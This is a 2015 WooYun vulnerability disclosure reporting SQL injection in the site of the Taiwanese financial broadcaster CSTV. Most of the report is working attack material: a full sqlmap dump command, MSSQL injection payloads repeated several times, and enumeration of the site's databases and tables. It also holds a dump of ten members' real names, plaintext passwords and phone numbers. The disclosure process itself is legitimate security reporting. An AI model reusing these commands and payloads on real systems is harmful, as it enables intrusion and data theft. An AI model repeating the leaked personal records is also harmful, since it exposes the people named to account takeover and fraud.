当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157405

漏洞标题:CSTV中華財經台存在SQL注射漏洞(大量用户真实姓名电话明文密码邮箱地址泄露)(臺灣地區)

相关厂商:CSTV中華財經台

漏洞作者: 路人甲

提交时间:2015-12-01 19:36

修复时间:2016-01-16 16:00

公开时间:2016-01-16 16:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

全球經貿瞬息萬變,網際網路時代的來臨,也徹底改變了資訊傳輸與媒體的生態,想要在21世紀國際競爭中脫穎而出、創造企業優勢,就需要第一手的即時財經情報。

详细说明:

地址:http://**.**.**.**/newsContent.aspx?serial=6760

$ python sqlmap.py -u "http://**.**.**.**/newsContent.aspx?serial=6760" -p serial --technique=BEQ --random-agent --batch -D w02040 -T dbo.Members -C name,password,phone,id,email --dump --start 1 --stop 10


Database: w02040
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.Members | 4853    |
+-------------+---------+


Database: w02040
Table: Members
[10 entries]
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+
| name                | password   | phone           | id         | email                                                        |
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+
| 陳 an an             | an420912   | 04-26229874     |  an745123  | chen3268@**.**.**.**                                           |
| 黃智洋                 |  cy79113   |                 |  cy79113   | cyhuang6531808@**.**.**.**                                  |
| 周強生                 | 62768278   | 02-22858862     |  man       | per@**.**.**.**                                            |
| 林鴻銘                 | t344328a   | 0918155211      |  takuya168 | takuya1688@**.**.**.**                                      |
| 李傑                  | !1qaz2ws   |                 | !1qaz2ws   | neil.tpe@**.**.**.**                                           |
| 陳芳美                 | h888988    | 23576588        | ?。88988    | feng2088988                                                  |
| ?成仕                 | 660124sc   |                 | ??菜?148    | sunchengshi@**.**.**.**                                          |
| ?成仕                 | 660124sc   |                 | ??菜?888    | sunchengshi@**.**.**.**                                          |
| 孫美英                 | C5ICKVE4   | 02(22229108     | ?a45782    | a45782@kimo。com                                              |
| 廖明玉                 | Azyx2355   | 0933258486      | @093325848 |                                                              |
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+

漏洞证明:

current user:    'w02040'
current user is DBA:    False
database management system users [6]:
[*] BUILTIN\\Administrators
[*] CSTV\\Administrator
[*] sa
[*] TB
[*] TB_w
[*] w02040
Database: tempdb
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| dbo.syssegments               | 3       |
+-------------------------------+---------+
Database: master
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| dbo.spt_values                | 730     |
| dbo.spt_datatype_info         | 36      |
| dbo.spt_server_info           | 29      |
| dbo.spt_provider_types        | 25      |
| dbo.spt_datatype_info_ext     | 10      |
| dbo.spt_monitor               | 1       |
+-------------------------------+---------+
Database: w02040
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| dbo.Video_hit_tbl             | 48672   |
| dbo.tbl_影音主檔                      | 46425   |
| dbo.Vw_影音                       | 11963   |
| dbo.teacherNewsActi           | 4866    |
| dbo.Members                   | 4853    |
| dbo.teacherReportFax          | 4511    |
| dbo.reportFaxContent_vw       | 4508    |
| dbo.NewsActiContent_vw        | 3283    |
| dbo.EventBillboard_tbl        | 922     |
| dbo.InvestCompany_Member_tbl  | 693     |
| dbo.AnalyzerChannel_tbl       | 552     |
| dbo.LVMH_order                | 368     |
| dbo.LVMH_OrderDetail          | 368     |
| dbo.Analyzer_tbl              | 256     |
| dbo.Analyzer_Company_vw       | 252     |
| dbo.Analyzer_vw               | 252     |
| dbo.AnalyzerDVD_tbl           | 127     |
| dbo.AnalyzerVoice_tbl         | 127     |
| dbo.admin_UserPerm_tbl        | 126     |
| dbo.LVMH_Sales                | 115     |
| dbo.AnalyzerProgram_tbl       | 109     |
| dbo.InvestCompany_tbl         | 95      |
| dbo.sysconstraints            | 79      |
| dbo.LVMH_ID                   | 65      |
| dbo.AnalyzerChannel_vw        | 59      |
| dbo.vw_MoneyTV_排行榜               | 48      |
| dbo.Vw_排行榜                       | 46      |
| dbo.TB_SentBooks_tbl          | 40      |
| dbo.Forum                     | 35      |
| dbo.TB_Members_Duty_vw        | 29      |
| dbo.admin_user_tbl            | 28      |
| dbo.forumTalk                 | 28      |
| dbo.view_最近影音                     | 27      |
| dbo.TB_Duty_Detail_tbl        | 25      |
| dbo.Vw_重大要聞                       | 22      |
| dbo.admin_permission_tbl      | 21      |
| dbo.NewsActiKind              | 18      |
| dbo.AD_tbl                    | 15      |
| dbo.TB_Members_tbl            | 14      |
| dbo.Analyzer_Voice_vw         | 13      |
| dbo.TB_Member_Unit_vw         | 13      |
| dbo.Analyzer_Company_Count_vw | 12      |
| dbo.TB_Duty_tbl               | 11      |
| dbo.ADType_tbl                | 8       |
| dbo.shop                      | 8       |
| dbo.TB_Backend_Functions_tbl  | 7       |
| dbo.ReportFaxKind             | 6       |
| dbo.TB_Donation_Type_tbl      | 6       |
| dbo.TB_Lib_Detail_tbl         | 6       |
| dbo.TB_Member_Borrow_vw       | 6       |
| dbo.FuturesWebSite_tbl        | 3       |
| dbo.Info_tbl                  | 3       |
| dbo.syssegments               | 3       |
| dbo.TB_Donate_tbl             | 3       |
| dbo.TB_Members_Donate_vw      | 3       |
| dbo.billboard_vw              | 1       |
| dbo.EventBillboard_vw         | 1       |
| dbo.Magazine_tbl              | 1       |
| dbo.OnLineStream_tbl          | 1       |
| dbo.OnLineStream_vw           | 1       |
| dbo.PageView_tbl              | 1       |
| dbo.TB_Bible_tbl              | 1       |
| dbo.TB_Donate_Detail_tbl      | 1       |
| dbo.TB_Lib_tbl                | 1       |
| dbo.TB_Msg_tbl                | 1       |
| dbo.Vw_影音最近日                       | 1       |
+-------------------------------+---------+
Database: msdb
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| dbo.sysconstraints            | 99      |
| dbo.syscategories             | 19      |
| dbo.backupfile                | 10      |
| dbo.backupmediafamily         | 9       |
| dbo.backupmediaset            | 9       |
| dbo.backupset                 | 9       |
| dbo.restorefile               | 2       |
| dbo.restorefilegroup          | 1       |
| dbo.restorehistory            | 1       |
+-------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: serial (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: serial=6760 AND 2345=2345
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
Database: w02040
Table: Video_hit_tbl
[5 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| hit           | int           |
| lastUpdated   | smalldatetime |
| postdate      | char          |
| source        | smallint      |
| videoFileName | char          |
+---------------+---------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: serial (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: serial=6760 AND 2345=2345
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
Database: w02040
Table: Members
[14 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| addr             | char     |
| birthday         | datetime |
| cellphone        | char     |
| createDate       | datetime |
| email            | char     |
| id               | char     |
| name             | char     |
| password         | char     |
| phone            | char     |
| sex              | bit      |
| vip              | char     |
| vipBlackListDate | datetime |
| vipPoint         | int      |
| vipValidDate     | datetime |
+------------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: serial (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: serial=6760 AND 2345=2345
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
Database: w02040
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.Members | 4853    |
+-------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: serial (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: serial=6760 AND 2345=2345
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: serial=6760 AND 7267=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7267=7267) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: serial=(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9243=9243) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
Database: w02040
Table: Members
[10 entries]
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+
| name                | password   | phone           | id         | email                                                        |
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+
| 陳 an an             | an420912   | 04-26229874     |  an745123  | chen3268@**.**.**.**                                           |
| 黃智洋                 |  cy79113   |                 |  cy79113   | cyhuang6531808@**.**.**.**                                  |
| 周強生                 | 62768278   | 02-22858862     |  man       | per@**.**.**.**                                            |
| 林鴻銘                 | t344328a   | 0918155211      |  takuya168 | takuya1688@**.**.**.**                                      |
| 李傑                  | !1qaz2ws   |                 | !1qaz2ws   | neil.tpe@**.**.**.**                                           |
| 陳芳美                 | h888988    | 23576588        | ?。88988    | feng2088988                                                  |
| ?成仕                 | 660124sc   |                 | ??菜?148    | sunchengshi@**.**.**.**                                          |
| ?成仕                 | 660124sc   |                 | ??菜?888    | sunchengshi@**.**.**.**                                          |
| 孫美英                 | C5ICKVE4   | 02(22229108     | ?a45782    | a45782@kimo。com                                              |
| 廖明玉                 | Azyx2355   | 0933258486      | @093325848 |                                                              |
+---------------------+------------+-----------------+------------+--------------------------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-02 15:59

厂商回复:

感謝通報

最新状态:

暂无